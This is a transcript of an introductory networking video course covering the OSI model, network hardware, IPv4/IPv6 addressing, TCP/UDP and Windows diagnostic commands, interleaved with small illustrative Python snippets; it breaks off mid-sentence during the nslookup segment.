Cybersecurity - Intermediate
In this video, you will learn how to map network hardware and software to the OSI model.
Objectives
[Topic title: The OSI Model. The presenter is Dan Lachance.] In this video, I'll talk about the OSI model. OSI
stands for Open Systems Interconnection. This layered model is used to map communications technologies to a common framework that's accepted internationally. Hardware such as network interface cards, routers,
switches, and telephony equipment can easily be mapped to layers of the OSI model as can software including
all of the protocols within the IPv4 and IPv6 suites. One way to easily remember the layers in the OSI model
starting from Layer 7 – the application layer – is the mnemonic "All People Seem To Need Data Processing"
where each letter stands for the first letter of the layer of the OSI model. Layer 7 is application, Layer 6 is
presentation, Layer 5 is session, Layer 4 is transport, Layer 3 is network, Layer 2 is data-link, and finally Layer
1 of the OSI model is physical.
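As a purely illustrative aside (not part of the original presentation), the layer numbers, names, and the kinds of examples mentioned in this video could be sketched in a few lines of Python:

# Illustrative sketch only: OSI layer numbers mapped to names and to the
# sorts of examples mentioned in this video.
osi_layers = {
    7: ("Application", "HTTP, SSH"),
    6: ("Presentation", "character sets, encryption, compression"),
    5: ("Session", "session setup and teardown, RPC"),
    4: ("Transport", "TCP, UDP, port addresses"),
    3: ("Network", "IP, routing, IPv4/IPv6 addresses"),
    2: ("Data-link", "MAC addresses, Ethernet"),
    1: ("Physical", "cables, connectors, wireless specifications"),
}
for number in sorted(osi_layers, reverse=True):
    name, examples = osi_layers[number]
    print(f"Layer {number}: {name} ({examples})")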
Let's dive into each of these in a bit more detail. Layer 1 of the OSI model is the physical layer. It's concerned
with the electrical specifications and cables, connectors and various wireless communication specifications.
Layer 2 of the OSI model is called the data-link layer. Its purpose is to deal with accessing the network
transmission medium such as trying to make a connection and transmitting data on an Ethernet or a Token
Ring network. The data-link layer or Layer 2 also deals with Media Access Control or MAC addresses. These
are also called Layer-2 addresses, hardware addresses, or in some cases, physical addresses. But it all means
the same thing. It's a 48-bit hexadecimal unique identifier for a network interface, such as we see here. [For
example: 90-48-9A-11-BD-6F.]
The network layer – Layer 3 of the OSI model – deals with IP, the Internet Protocol. It's also responsible for
dealing with the routing of packets to remote networks and the sharing of routing tables between routing
equipment. The IP address is also called a Layer-3 address. With IPv4, it's a 32-bit address such as
199.126.129.77. But, with IPv6, it's much longer, specifically four times longer – 128 bits long. And it's
expressed in hexadecimal. And each segment or each 16 bits is separated with a colon as we see in the example
listed here. [The example is: FE80::883B:CED4:63F3:F297.] Now, when you see a double colon side by side
like we see here, it means we've got a series of zeros in there.
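As a quick aside of my own (not shown in the video), Python's standard ipaddress module can expand a compressed IPv6 address so you can see the zero hextets that the double colon hides:

# Sketch: expand the video's example IPv6 address to reveal the zeros
# compressed by the double colon. Standard library only.
import ipaddress
addr = ipaddress.IPv6Address("FE80::883B:CED4:63F3:F297")
print(addr.compressed)  # fe80::883b:ced4:63f3:f297
print(addr.exploded)    # fe80:0000:0000:0000:883b:ced4:63f3:f297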
Layer 4 of the OSI model is the transport layer. It's concerned with the end-to-end transmission of packets.
And so protocols like TCP (Transmission Control Protocol) and UDP (User Datagram Protocol) map to
Layer 4. TCP ensures that packets are received by a target. So it's a very careful protocol. UDP is the polar
opposite. It doesn't guarantee the packets are being received by the target. It simply sends them out with the
best effort. The port address identifies a running network service that clients can connect to. So a Layer-4
address is a port address. So, for example, web servers listen on TCP port 80 and DNS servers listen on UDP
port 53 for client connections.
Layer 5 of the OSI model is the session layer. It deals with communication session creation, maintenance, and
tear down. But it doesn't imply that users are logging into something. This can happen internally within the
software without the user even knowing a session is being established. This is often used by network
programmers to initiate a call to a function on a remote network host using what are commonly called RPCs –
remote procedure calls. The session layer also deals with things like half-duplex communication, where we
have communication being transmitted in one direction at a time as opposed to full duplex, which is
bidirectional simultaneous communications where, for instance, we could send and receive at the exact same
time.
Layer 6 of the OSI model is the presentation layer. Its concern is with how data is presented between
communicating hosts. So there are differing character sets that we might be dealing with. We might have
encryption and decryption that have to be dealt with depending on whether we're using a secured transmission
or not. There is also compression and decompression that can be dealt with. All of these things occur at
the presentation layer of the OSI model.
Layer 7 – the highest level – is the application layer. This is where higher-level protocols function, such as HTTP
(the Hypertext Transfer Protocol) or SSH (Secure Shell) to name just a few. However, the application layer
doesn't necessarily imply that it has to involve user interaction, for instance, to run an application. So the OSI
model then is a conceptual model that we use to map network hardware and software to a common framework
that is accepted internationally. In this video, we discussed the OSI model.
In this video, find out how to identify when to use specific network hardware.
Objectives
[Topic title: Network Hardware. The presenter is Dan Lachance.] Being a cybersecurity analyst means
understanding not only the details about communication software, but also the underlying hardware that makes
it happen. In this video, we'll talk about network hardware. Network hardware begins with cables such as
copper wires. Now copper wire cabling is used to transmit electrical signals down the copper wires.
Commonly, we will see unshielded twisted pair or UTP and shielded twisted pair – STP – cables. Shielded
twisted pair cables are less susceptible to external interference as signals travel down the copper wires. Copper
wires are also potentially susceptible to wiretapping, which allows other individuals to capture the signals that
are being transmitted.
Now compare that to fiber optic cabling, which transmits pulses of light instead of electricity. This happens
over glass or plastic fibers. And it's much more difficult to intercept signals than it would be with wiretapping
on copper wire-based cables. The network interface card is another piece of hardware that exists in
communicating devices. It's called a Layer-2 device. It might be a wired NIC. So, for example, server
hardware physically might have three or four NICs or we might have a Wi-Fi NIC built into a laptop or a
smartphone, same goes for Bluetooth. Either way, if it receives and transmits on a network, it's a network
interface card. Network interface cards have a hardware or MAC address, which is called a Layer-2
address. [MAC address is also called a hardware address and a physical address.]
Now this is the 48-bit hexadecimal unique identifier [For example: 90-48-9A-11-BD-6F.] for a network
interface on the local area network only. The MAC address can also be spoofed so a malicious user could use
freely available software to make their device look like some other valid device that has a trusted MAC address.
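As a small aside (my own sketch, not from the video), you can display a machine's MAC address as a 48-bit hexadecimal value with Python's standard library; note that uuid.getnode() can fall back to a random 48-bit number when no hardware address can be determined:

# Sketch: show this machine's MAC address as a 48-bit hexadecimal identifier.
# Caveat: uuid.getnode() may return a random value if no MAC is found.
import uuid
mac_int = uuid.getnode()            # MAC address as a 48-bit integer
mac_hex = f"{mac_int:012X}"         # 12 hexadecimal digits, zero-padded
print("-".join(mac_hex[i:i + 2] for i in range(0, 12, 2)))  # e.g. 90-48-9A-11-BD-6F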
NICs also support multihoming in a device where there is more than one NIC. And we'll often see this in
firewall devices. NIC teaming allows multiple network cards to work together for the purposes of
either load balancing or aggregated bandwidth. The other way we can look at this is even a single network
interface card could have multiple IP addresses. And you might find that happening if you've got, for instance,
a web server hosting multiple different web sites each on a different IP address.
So each network interface card can also have different network traffic rules applied that control what traffic is allowed in through that card or out through the card. And that's especially relevant in multihomed firewall
devices. Routers have at least two NICs if not more, so they can take traffic in from one interface and route it
to a network through a different interface. Layer-2 and Layer-3 switches supersede hubs. They are the central
connectivity point in a star-wired network. And they are very common. Managed switches are managed
usually over a secure protocol such as HTTPS or SSH as opposed to HTTP or Telnet, which are not considered
secure for transmission of credentials. A managed switch is called managed because you can remotely manage
it and configure and tweak how the ports behave and so on. Lower end or cheaper switches will still function
as a central connectivity point. But you can't really configure them in any way because they wouldn't be
managed.
We can also configure a monitoring port on a switch so that we can capture network traffic. Now the nature of
a switch is that any traffic sent between two nodes is only seen by those nodes and not every other port in the
switch. So, if we want to capture all network traffic in a switch, we usually put our device into – let's say – port
1 of a switch, configure port monitoring for all the other ports so that it copies all the packets to port 1 where
we're running our packet capturing tool or software. Within a switch, we can configure a VLAN – a virtual
local area network. This allows for network traffic segmentation. It also allows us to do this for the purposes
of performance. Having smaller networks as opposed to one big one is much more efficient. Also for security,
we might, for instance, want storage area network traffic in the form of iSCSI to occur on a separate VLAN
from regular user traffic.
All ports on a switch are in a single VLAN by default. But, of course, this can be changed on a managed
switch. VLAN membership can be determined by the physical port that a cable is plugged into on the switch or
it could even be the IP address of the plugged-in device and so on. A router is a Layer-3 device. And it's a crucial
part of network hardware that sends traffic from one network to another. Without routers, the Internet could
not exist. Routers have at least two network interfaces. They do not forward network broadcasts. And the
reason for this is due to security and performance.
Routers can be configured with packet filtering rules. In this way, they're considered a Layer-4 type of firewall
because they can block up to and including the port address for a network service. Of course, they can also
allow or deny traffic based on IP address and things like that. Routers need to be configured with the correct IP
addressing in order to route traffic correctly. Network devices point to the router interface on their subnet as
the default gateway. And that's how a device on a network can communicate outside of the local area network.
Routers maintain their own routing tables in memory. So routers have memory just like a regular PC. And a
routing table lists the best way to transmit packets to a remote network. So the routing table contains things
like network addresses. There could be multiple routes to the same location but with different efficiencies.
We can also allocate – or it might automatically be determined – the routing cost. The routing cost is used to
determine which path we should take when we have multiple paths to the same destination. Routers also share
routing information with other routers using routing protocols, such as RIP – the Routing Information
Protocol; OSPF – Open Shortest Path First; and BGP – the Border Gateway Protocol. Routers are ideally
managed over the network by administrators via HTTPS or SSH as opposed to the insecure counterparts of
HTTP or Telnet.
In our diagram, we see two routers – router 0 and router 1. [The Routing Diagram is displayed on the screen.
It shows router0 interconnected to host0, host1, and router1. The router1 is further interconnected to host2
and host3.] Now, if we take a look at our diagram in the upper left, we've got host0 and then bottom left, we've
got host1. Now, in order for those devices to send traffic through router0 – if they're on the same local area
network – they need to point to the network interface for router0 on their local subnet. Now router0 would then
be connected in some way to router1. And sometimes the connection between routers is called a backbone. So
then the traffic could be routed to router 1. Now, in the same way, in our diagram, the devices over on the right
hosts – host2 and host3 – would have to point to the IP address of the network interface for router1 on their
local area network. So the theme here is that you can't point to a router interface that's not on your local area
network because how would you get to it in the first place because that's the purpose of the router or as it's
called in IP networks, the default gateway.
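To make that point concrete, here is a minimal sketch of my own (the addresses are hypothetical) showing how you might check that a candidate default gateway actually sits inside the host's subnet:

# Sketch: a default gateway is only usable if it is inside the host's own
# subnet. The addresses below are hypothetical examples.
import ipaddress
host_interface = ipaddress.ip_interface("192.168.1.50/24")
gateway = ipaddress.ip_address("192.168.1.1")
if gateway in host_interface.network:
    print("Gateway is on the local subnet - usable as a default gateway")
else:
    print("Gateway is NOT on the local subnet - the host cannot reach it")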
Wireless access points and wireless routers are considered Layer-2 and Layer-3 devices. This is because they deal with not only IP addresses – Layer-3 addresses – but also MAC addresses at Layer 2. Wireless access points and wireless routers allow wireless connectivity for Wi-Fi networking and Bluetooth, and they also create a wireless local area
network or WLAN. They often have a wired connection to network infrastructure. And they're ideally
managed like network equipment should be over a secure protocol such as HTTPS or SSH. Other network
equipment that we might encounter include appliances of various types like hardware encryption and
decryption devices, Voice over IP, and telephony integration devices, which should be placed on a separate
VLAN for performance and security reasons. We might also have hardware firewalls, hardware VPNs, and
also different types of computing appliances in manufacturing and industrial environments. In this video, we
discussed network hardware.
[Topic title: IPv4. The presenter is Dan Lachance.] In this video, I'll talk about IPv4. IPv4 or Internet Protocol
version 4 is what's in use on the Internet today as a communication software protocol. It's also widely used on
internal enterprise networks. And it stems from the 1970s. However, IPv4 was not designed initially with
security in mind. So any application-specific transmission security has been an afterthought since the 70s such
as HTTPS to secure an HTTP web server. However, HTTPS is specific to the web server. So, if we wanted to
secure 20 web servers, we would have 20 configurations to go through. Alternatively, with IPv4 we can use
IPsec – IP security, which is not application specific.
So, for example, if we enabled IPsec on all of our internal clients and servers, then what it means is –
regardless of which transmission protocol is being used – everything would be encrypted and potentially even
digitally signed. IP addresses are 32 bits long, for example 199.126.129.77. So they're expressed in decimal
form or base 10 where each eight bits or byte is separated with a dot. The subnet mask determines which part
of the IP address identifies the network versus the host. And the subnet mask is expressed again either in
decimal (base 10) form or in CIDR form. So, in our example, where we have an IP address of 199.126.129.77, if
our subnet mask happens to be 255.255.255.0 that means that the first three bytes identify the network. And, in
this case, that means the network is 199.126.129. So the last number 77 then would be a host on the network.
Now, with the 255s, that is the subnet mask being expressed in decimal form. In shorthand, it would be simply
/24, which identifies the number of binary bits within the subnet mask. There are some special IPv4 addresses
like the local loopback, which has an address of 127.0.0.1 on a device. And we use this if we're testing our
local IP stack when troubleshooting. There is also the Automatic Private IP Addresses which are called APIPA
addresses. They have a prefix of 169.254. And a device will be configured with this when it can't contact a DHCP server. Now this APIPA address is only usable to communicate with other APIPA hosts on the local
area network only. An address of 0.0.0.0 means that there is not yet an address that's been assigned to a device.
In the routing context, 0.0.0.0 means the default route.
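As an illustrative sketch (my own, using Python's standard ipaddress module rather than anything shown in the video), here is how the example address splits into network and host portions, along with checks for a few of the special ranges just mentioned:

# Sketch: split the video's example IPv4 address into network and host
# portions, and test a few of the special ranges mentioned above.
import ipaddress
iface = ipaddress.ip_interface("199.126.129.77/24")  # /24 = 255.255.255.0
print(iface.network)                                  # 199.126.129.0/24
print(iface.network.netmask)                          # 255.255.255.0
print(ipaddress.ip_address("127.0.0.1").is_loopback)        # True - local loopback
print(ipaddress.ip_address("169.254.10.20").is_link_local)  # True - APIPA range
print(ipaddress.ip_address("192.168.1.10").is_private)      # True - private range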
Network broadcasts for all networks have an address of 255.255.255.255. So all of the binary bits are set to
one. [Network broadcasts are used to transmit packets to all devices on all networks.] Routers don't forward
broadcasts. Then there are three private ranges of IP addresses designed to be used internally by companies
that will not be routed by Internet routers. They are the 10.0.0.0/8 range, the 172.16.0.0/12 range, and the 192.168.0.0/16 range. Now there are variations. So instead of 192.168.0.0/16, for example, in a home wireless network, we might instead have 192.168.1.0 with a /24 subnet mask. There are additional IPv4 settings beyond the IP address, subnet mask, and the special addresses to keep in mind. The default gateway is the IP address of a
router interface on your network that you use to communicate outside of the LAN.
There could be multiple default gateways on a single LAN. And you could send traffic through them
depending on where the destination is. Now one of the dangers with routers and default gateways is ARP cache
poisoning. If a malicious user can get on the network, then they could set up a malicious host that sends out a
periodic update to every device on the network claiming to be the router. In other words, basically, telling
everyone to update the MAC address that they have stored in memory for the router with the malicious host's MAC address. What that means is that all the traffic then gets routed through the malicious host, which would then probably forward it on to the Internet so nothing seems amiss. The bad part is that all traffic would be seen by
the malicious user.
For example, here I'm going to type ipconfig in a Windows command prompt. Now, for my network interface,
what I want to do is take a look at the default gateway. So here I see a default gateway address for my Wi-Fi
adapter. And the address is 192.168.1.1. If I clear the screen and then type arp -a, it shows me the ARP cache in memory on my client station, which basically shows me the physical MAC addresses for devices on my
LAN and the corresponding IPs. Now I can see here I've got an entry for 192.168.1.1 along with the physical
or MAC address of my router. So ARP cache poisoning sends out an update that changes this physical address
for the default gateway. Essentially, tricking machines into sending traffic that's destined for the default
gateway to the malicious host.
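As a rough sketch of my own (not something demonstrated in the video), you could shell out to the same arp -a command and flag any MAC address claimed by more than one IP, which can be one symptom of ARP cache poisoning; the output parsing here is a simplifying assumption, since arp -a formats differ between platforms:

# Rough sketch: run "arp -a" and warn when one MAC address is claimed by
# several IPs - a possible sign of ARP cache poisoning. The regular
# expression is a simplifying assumption; real output formats vary.
import re
import subprocess
from collections import defaultdict
output = subprocess.run(["arp", "-a"], capture_output=True, text=True).stdout
pairs = re.findall(r"(\d+\.\d+\.\d+\.\d+)\D+([0-9a-fA-F]{2}(?:[-:][0-9a-fA-F]{2}){5})", output)
ips_by_mac = defaultdict(set)
for ip, mac in pairs:
    ips_by_mac[mac.lower().replace(":", "-")].add(ip)
for mac, ips in ips_by_mac.items():
    if len(ips) > 1:
        print(f"Warning: {mac} is claimed by multiple IPs: {sorted(ips)}")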
So it's paramount then that we protect how people get on our network in the first place. The next big IPv4
setting would be the domain name service server or DNS server or servers. It's the IP address of one or more
lookup servers. And they also do not have to be on your network like the default gateway does. It allows
connecting to a service by name which is easy to remember versus the IP address which is difficult to
remember. You should configure more than one DNS server. So, if one fails, devices can still resolve names to IP addresses by failing over to the next DNS server configured. One danger with DNS – and there are many
– is DNS poisoning which is also called DNS spoofing. Essentially, this redirects legitimate traffic to a
malicious host. So you can imagine, if you frequent your online banking site and a malicious user hacks into a
DNS server that you point to, they could redirect that same URL – that friendly name you're used to typing in –
to the IP address of a web server under their control that looks like the real website but isn't. And it will be
used to gather your online banking credentials.
IPv4 port address translation allows Internet access through a single public IP address on the PAT router. It
also hides the internal IP addressing scheme for internal hosts going through the PAT router. And it doesn't allow connections initiated from the Internet to reach internal hosts. Pictured in our diagram, we see three
hosts on the inside network with addresses such as 10.0.0.1, 10.0.0.2, and 10.0.0.3. They would be configured
to point to their default gateway, which is just a router, which in turn is configured with port address
translation. Now that gets them out to the Internet. Now what's interesting about this is a PAT router has a
memory table where it tracks the inside local addresses – the internal addresses – as well as an inside global address. Now the inside global address uses the public IP address of the PAT router along with a unique port identifier
which we see here in the form of 1000, 1001, and 1002. So it knows how to get traffic back into a host that
requested something on the inside. In this video, we talked about IPv4.
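The inside local and inside global tracking described above can be pictured as a simple lookup table. Here is a purely illustrative sketch; the public IP, internal source ports, and mappings are assumptions invented to mirror the diagram:

# Illustrative sketch of a PAT router's translation table: each internal
# (inside local) socket maps to the router's single public IP plus a unique
# port (inside global). All values below are hypothetical.
PUBLIC_IP = "203.0.113.10"  # assumed public address of the PAT router
pat_table = {
    (PUBLIC_IP, 1000): ("10.0.0.1", 51000),  # inside global -> inside local
    (PUBLIC_IP, 1001): ("10.0.0.2", 51001),
    (PUBLIC_IP, 1002): ("10.0.0.3", 51002),
}
def translate_inbound(public_ip, public_port):
    """Return the internal host and port a returning packet belongs to."""
    return pat_table.get((public_ip, public_port))
print(translate_inbound(PUBLIC_IP, 1001))  # ('10.0.0.2', 51001)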
After completing this video, you will be able to understand IPv6 settings.
Objectives
[Topic title: IPv6. The presenter is Dan Lachance.] In this video, I'll talk about IPv6. IPv6 is Internet Protocol
version 6. It's not as widely used currently as IPv4, which is ubiquitous everywhere on the Internet. However,
it was designed with security in mind in the form of IPsec. It was also designed with media streaming or
quality of service in mind for applications that might deal with audio, video streaming, or Voice-over-IP
transmissions over a packet-switched network. Interestingly, in IPv6 there is no such thing as broadcasting as there is in IPv4. IPv4 dealt with subnet broadcasts, all-networks broadcasts, ARP broadcasts, DHCP discovery broadcasts, and so on. That doesn't exist with IPv6. What does exist is unicast from one to one, which is also possible with IPv4, as is multicast. So multicast transmission goes from one
device to a group of registered listening devices on that multicast address.
In IPv6 that's used for Neighbor Solicitation messages to discover other IPv6 devices on the network. IPv6 has
something that IPv4 doesn't in the form of anycast transmissions. Now, an anycast transmission is similar to a multicast, but the distinction is that it seeks out only the nearest member of the group. IPv6 addresses are
128 bits long. And they're expressed in hexadecimal. Now hexadecimal means that we've got letters A through
to F, where A is used for number 10 and F is used for number 15. Of course, we have our standard 0 through to
9 for our regular digits. [For example: FE80::883B:CED4:63F3:F297.]
Now, with IPv6 addresses, each 16 bits – we'll call that a hextet – is separated not by a period but rather by a
full colon. As seen in our example, you can use a double colon once within an IPv6 address to represent a series
of zeros, which is really the absence of a value. With IPv6, the subnet prefix length determines which portion
of the IP identifies the network versus host. So it's kind of like the subnet mask in IPv4. And it can be
expressed in CIDR form, which it normally is, such as /64, which means there are 64 bits in the subnet prefix.
There are special IPv6 addresses such as ::1 which means local loopback. This is used when troubleshooting
our local IP stack. Addresses beginning with fe80 are self-assigned link-local addresses in IPv6. And this will
always exist on an IPv6 host. It allows LAN communication only, but it lets the host discover nodes on that network.
Here, in a Windows command prompt, if I were to type ipconfig and I'm running Windows 10 on this station, I
would see that I've got IPv6 addresses available. For example, for my Wi-Fi adapter, I don't have any IPv6
because it's disabled for that adapter. But, if I take a look up at my connection Ethernet 3 here, I see that I've
got both a Link-Local IPv6 Address. So it begins with fe80, and that never goes away. Well, the only way it
goes away, of course, is if you turn off IPv6 entirely on your network interface.
I've also got another IPv6 Address that was manually assigned to this interface in the form of 1:2:3:4::1, where the double colon represents a series of zeros. IPv6 addresses starting with ff00 are multicast addresses. If the prefix is 2000, then
it's called a global unicast packet transmission, which is essentially a public IPv6 address. Other settings for
IPv6 are very similar to additional settings for IPv4 such as the default gateway. The IP address of a router on
your network allows communication outside of the LAN. And, of course, there could be multiple default
gateways. You're not limited to having only one. DNS servers play the same role in IPv6 as they do with IPv4.
They are look-up servers that do not have to be on your network. And they allow connection to services by
name, which is easier to remember than the IP address, especially with IPv6. So the
interesting thing about this, of course, is that when we build a host record in a zone in DNS, so that would be a
look-up record that maps a name to an IP address – in IPv4, that's called an A record. In IPv6, it's called
a quad A record or A-A-A-A. In this video, we discussed IPv6.
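As a quick programmatic aside of my own (not demonstrated in the video), the standard socket module can ask the resolver for IPv6 addresses, which come from those quad A records; this assumes the name you query actually publishes AAAA records and that your resolver returns them:

# Sketch: resolve a name to IPv6 addresses (AAAA records) with the standard
# library. Assumes the target publishes AAAA records and that the local
# resolver can return them.
import socket
results = socket.getaddrinfo("www.google.com", None, family=socket.AF_INET6)
for family, _, _, _, sockaddr in results:
    print(sockaddr[0])  # an IPv6 address, e.g. 2607:f8b0:...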
[Topic title: TCP and UDP. The presenter is Dan Lachance.] In this video, we'll talk about TCP/IP's transport
mechanisms – TCP and UDP. TCP and UDP are protocols that apply to Layer 4 of the OSI model. Higher
level apps need some kind of a transport mechanism. And that comes in the form of either TCP or UDP.
Usually, it's determined by the software developer, but some network services will allow admins to change whether the listening port uses TCP or UDP. TCP is the Transmission Control Protocol. It
establishes a session with a target before transmitting any data. It's considered connection oriented because it
sets up a three-way handshake before transmitting data. In packet number one, the initiator sends what's called
a SYN packet to the target. This means synchronize. It's used to synchronize sequence numbers, which are
used to number the transmitted packets.
Then the target will send back a SYN-ACK to acknowledge that yes, we're going to agree on our starting
sequence number. The sender or the initiator in number three then acknowledges the acknowledgement to the
original SYN packet. [That is, SYN-ACK ACK.] After this has been completed, the connection is established
and data may be transferred. However, what's interesting is that the sender will require an acknowledgement
for each and every single packet that is sent because TCP aside from being connection oriented is also a very
careful and reliable protocol. Common TCP header fields include things that we might see within an HTTPS
packet such as the source port number. Now notice, in our diagram, the source port number is 59591 – that's a pretty high-numbered port – whereas the destination port number is HTTPS port 443.
What this is telling us is that this is a transmission from a client web browser to a secured web server because
secured web servers listen on port 443, but communicate back with clients on a higher-level port, in this case
59591. Now we can also see that there would be a sequence number, [The sequence number is 1453.] which is
tracked by both ends of the connection for the transmission of packets within the session. There is also the next
sequence number. [The next sequence number is 1554.] There is an acknowledgement number [The
acknowledgement number is 698.] and a checksum [The checksum number is 0x2bbf.] to ensure that what is
received is what was sent. Now, from a security perspective, it's important to know these internal workings
because a lot of malicious attacks take advantage of these. And they might use overlapping sequence numbers
to crash a host. Or, as a matter of fact, a malicious user can actually forge every item within a packet, the
payload, the headers. All of this stuff can be forged by a malicious user with freely available tools.
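For a hands-on feel (a sketch of my own, not part of the presentation), the three-way handshake described above happens under the covers when a client socket calls connect(); the host and port below are examples only:

# Sketch: the operating system performs the SYN / SYN-ACK / ACK handshake
# when connect() is called on a TCP (SOCK_STREAM) socket. Host and port
# are examples only.
import socket
with socket.create_connection(("www.google.com", 443), timeout=5) as sock:
    local_port = sock.getsockname()[1]
    print(f"Connected from ephemeral port {local_port} to port 443")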
UDP is the User Datagram Protocol. It's another transport mechanism besides TCP. It's considered
connectionless where TCP is connection oriented. So therefore, with UDP a session is not established before
transmitting data. So, in other words, it simply sends out the traffic, which hopefully gets received by the intended recipient. There is no checking. So the sender does not require an acknowledgement for every sent packet. So,
because there is no session per se with UDP, firewalls then treat every packet as a unique connection. UDP
header fields are few compared to TCP. So, in this case, we have a DNS query packet where the source port
number is a high-numbered port. [The source port number is 57035.]
Now remember port numbers are also called Layer 4 addresses. The destination port in this example is domain
or UDP port 53. What this is telling us is that this is coming from a client device, so a higher source port
destined to a DNS server. It's some kind of a DNS query. Now we'll also see other fields such as the length of
the transmission in bytes. So, in this case, 60 and a checksum value [The checksum value is 0x5532.] to ensure
that what is received is what was sent. Now it's important that we understand common TCP and UDP port
numbers. Now you might ask why is this relevant. This is important because network scanning, which can be
conducted legitimately or by malicious users for reconnaissance, can identify services based on the listening
port number.
Now, if a malicious user scans a network and sees port 25 on TCP, they're going to know that that's SMTP and
they might probe that further to discover the type of mail server you're running and then find vulnerabilities for
it. So on TCP, port 22 is for SSH – Secure Shell – which is used as a secured remote administration command
line tool. Port 25 over TCP is for the Simple Mail Transfer Protocol for transferring mail between mail servers on the Internet. TCP port 80 is for HTTP web servers, TCP 443 – secured HTTP web servers, TCP
3389 is used by Remote Desktop Protocol to remotely administer Windows hosts.
On the UDP side, we've got port 53, which is for DNS client queries going to a DNS server. And we also have
UDP ports 67 and 68 used for DHCP when a client needs to acquire an IP configuration from a centralized
DHCP server. Now there are many, many other port numbers for different network services; this is just a tiny sampling. There is then the notion of stateful packet inspection. Stateful packet inspection devices track packets belonging to a TCP session, so they know that a session is established. And they don't treat each
individual packet as a separate connection as is the case with UDP. So that would be called stateless packet
inspection where the device is unaware of data transmission patterns. Now, in some cases, when you look at
firewall solutions – be they hardware or software based – it might be a stateful packet inspection device or a stateless one. Ideally, we want a device capable of stateful packet inspection. In this video, we discussed TCP
and UDP.
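To round out the comparison with a sketch of my own (not from the video), the UDP side looks like this: a datagram socket just sends, with no handshake and no acknowledgement. The destination uses a documentation address and the payload is not a well-formed DNS query; both are illustrative assumptions:

# Sketch: UDP is connectionless - sendto() transmits a datagram with no
# handshake and no acknowledgement. The destination and payload are
# illustrative only (this is not a real DNS query).
import socket
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.sendto(b"hello", ("192.0.2.53", 53))  # 192.0.2.0/24 is a documentation range
sock.close()
print("Datagram sent - UDP gives no indication of whether it arrived")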
understand which Windows tools to use when configuring and troubleshooting TCP/IP
[Topic title: Use Common Windows TCP/IP Utilities. The presenter is Dan Lachance.] In this video, we'll take
a look at some common Windows TCP/IP utilities. Both Windows client/server operating systems include a
number of built-in tools that we can use to test and troubleshoot IP connectivity. Let's start here in a Windows
command prompt on a Windows 10 station by typing ipconfig. Here it returns my network interfaces with a bit
of information related to IP settings for each. So, for example, as I scroll down, if I look at my wireless LAN
adapter which I've called Wi-Fi, I can see my DNS Suffix name, my IPv4 Address, my Subnet Mask, and my
Default Gateway. Of course, if I were to type ipconfig /all, I would get much more information for each
network interface. Let's go back and take a look at my Wi-Fi adapter [Dan refers to the information regarding
Wireless LAN adapter Wi-Fi displayed in the output.] because now I can see the description of the type of Wi-
Fi adapter it is. I can see the Physical Address otherwise known as the MAC address for my Wi-Fi adapter. I
can also see that I've got a DHCP Server listed here along with Lease Obtained and expiry information. So of
course this is a DHCP client. [Other information regarding Wi-Fi adapter displayed in the output is: IPv4
Address, Subnet Mask, Lease Expires, and Default Gateway.]
I can also see the various DNS Servers that this station is pointing to for name resolution. So I'm going to type
cls to clear the screen. Let's take a look at a couple of other things here. Now, for DHCP clients, of course, we could type ipconfig /release to release our IP settings in their entirety back to the DHCP server. And then we could type ipconfig /renew to renew them. Now sometimes you might do this if
there is some kind of a problem receiving IP settings from DHCP. I'm not going to do that here because I do
have a valid connection. But I'm going to use the ping command. I'll start by pinging an IP address. [He
executes the following command: ping 192.168.1.1.] Here of course, if I get a reply, then I know that that device or host is up and running and replying on that address. Bear in mind though, in this day and age, the ICMP packets which ping uses are often blocked. And therefore, you may not get a ping reply.
We can also ping by name. If I type ping www.google.com, then we should see that it resolves it to an IP
address and that we're getting a reply from it. So we know DNS is working. We also know that google.com is
not blocking ICMP packets, at least not the echo request and reply types. At the same time, we can also work with
IPv6 if we've got IPv6 enabled. If I were to type ping -6 and then put in www.google.com – if we've got a
record in DNS specifically a quad A record, an A-A-A-A record, for google.com – it would return the IPv6
address. Of course, we would need to have IPv6 enabled for that to be successful. But ping really tells you
whether or not you're getting a response. If you're not getting a response, you don't really know if it's the target
host, the endpoint that's not available or if it's some router in between that's a problem. And that's where the
traceroute command tracert comes in. So I type tracert let's say www. – I'll pick a different host here –
eastlink.ca. [He executes the following command: tracert www.eastlink.ca.]
The first thing I see is that it gives me a response as it goes through my local default gateway. Then, for each gateway that it goes through, I'll get a separate listing here. We're starting to see this on the screen on separate lines. So we also have three samplings of the response time going through that
gateway. And, in some cases, some of the routers will return a name. So I can identify the service provider, in
this case the Internet service provider. And, in some cases, even geographically if it's a router that's in New
York or Montréal or Vancouver and so on. So tracert then shows me how far down the line I'm getting,
whereas ping just tells me whether or not a device is responding. I'm just going to press Ctrl+C here to
end this traceroute operation.
Now the next command we're going to take a look at here is the netstat command. If I type netstat and press
Enter, what it's going to do is show me any local listening port numbers that I have. [The output is displayed in
a tabular format with the following column headers: Proto, Local Address, Foreign Address, and State.] So,
for example, if I'm running a web server, I would have port 80 or 443 under Local Address and any foreign
address would be connections elsewhere connected to my web server. Now the same thing is true in the
opposite direction. You'll notice here, the third listing from the top is connected to the https port on
another foreign host, [He points to the third row in the table. The entry under Proto column is TCP, the entry
under Local Address column is 192.168.1.157.54236, the entry under Foreign Address column is iz-in-
f188:https, and the entry under State column is ESTABLISHED.] in other words port 443. Of course, if I look
under the Local Address column for that third entry down, it connects back to my local machine on a higher-
level port. So we can see all of the connections that have been established, in this case over TCP. The netstat command also has numerous command-line switches that will let you look at UDP ports and so on.
So, once again, I'm going to press Ctrl+C to cancel that operation. And I'm going to type cls to clear the screen. Another important command is arp, which is related to IP address to MAC address resolution. It stands for Address Resolution Protocol. I'm going to type arp -a to show all entries in the ARP cache. Now, when I do
that, I have it listed per interface. And, in the Internet Address column on the left, I see the IP address. And, in
the corresponding column to the right labeled Physical Address, I see the hardware address. The way this
works is that when you contact a device on your local area network, your machine will store in memory – or cache – the hardware or MAC address of that device. That way, your machine will not have to send out a broadcast the next time you try to connect to that IP asking which device owns it and what its MAC address is. It will already be cached here in memory.
So, for instance, 192.168.1.1 here is my default gateway, my local router. Because I've gone on the Internet recently, I can see it has cached the Physical or MAC Address of my default gateway here. You will not cache the MAC Address of remote hosts on other networks. The closest you'll get to that is caching the MAC address
of your default gateway. There is also the NS look-up or name server look-up command. I'm going to type
nslookup which puts me into interactive mode. It tells me which DNS server I'm connected to, which is a
Google public DNS server. [He executes the following command: nslookup. The following output is
displayed: Default Server: google-public-dns-a.google.com, Address: 8.8.8.8.] Now, from here, I can test or
